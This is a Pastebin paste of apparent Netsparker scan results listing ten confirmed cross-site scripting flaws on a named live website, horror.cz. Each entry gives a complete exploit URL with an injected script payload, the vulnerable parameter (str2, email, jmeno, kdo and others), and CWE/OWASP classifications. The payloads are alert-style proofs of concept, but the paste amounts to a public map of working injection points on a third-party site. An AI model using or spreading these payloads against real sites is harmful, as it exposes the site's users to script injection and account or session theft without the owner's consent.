Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- XSS (Cross-site Scripting)
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.horror.cz/index.php?str=profil&str2='"--></style></script><script>alert(0x0002C4)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: str2
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0002C4)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.horror.cz/index.php?str=kontakt&jmeno=3&email=\'\"--></style></script><script>netsparker(0x000A83)</script>&telefon=&zprava=3&odeslano=spamNE
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: email
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000A83)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.horror.cz/index.php?str=kontakt&jmeno=\'\"--></style></script><script>netsparker(0x000A93)</script>&email=netsparker@example.com&telefon=&zprava=3&odeslano=spamNE
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000A93)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.horror.cz/index.php?str=profil&str2=\'\"--></style></script><script>netsparker(0x000C6E)</script>&prijemce='"--></style></script><script>alert(0x000C6E)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: prijemce
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000C6E)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.horror.cz/index.php?str=profil&page=1&str2='"--></style></script><script>alert(0x000D26)</script>&rubrika=3
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: str2
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000D26)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.horror.cz/index.php?str=profil&str2='"--></style></script><script>alert(0x000D4E)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: str2
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x000D4E)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.horror.cz/index.php?str=kontakt&jmeno=3&email=netsparker@example.com&telefon=&zprava=\'\"--></style></script><script>netsparker(0x000C03)</script>&odeslano=spamNE
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: zprava
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000C03)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.horror.cz/UserArea/index.php?str=uzivatel-detail&kdo='"--></style></script><script>alert(0x00A934)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: kdo
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x00A934)</script>
- Severity: Important
- Confirmation: Confirmed
- URL: http://www.horror.cz/UserArea/index.php?str=uzivatel-detail&page=1&kdo='"--></style></script><script>alert(0x00C727)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: kdo
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x00C727)</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement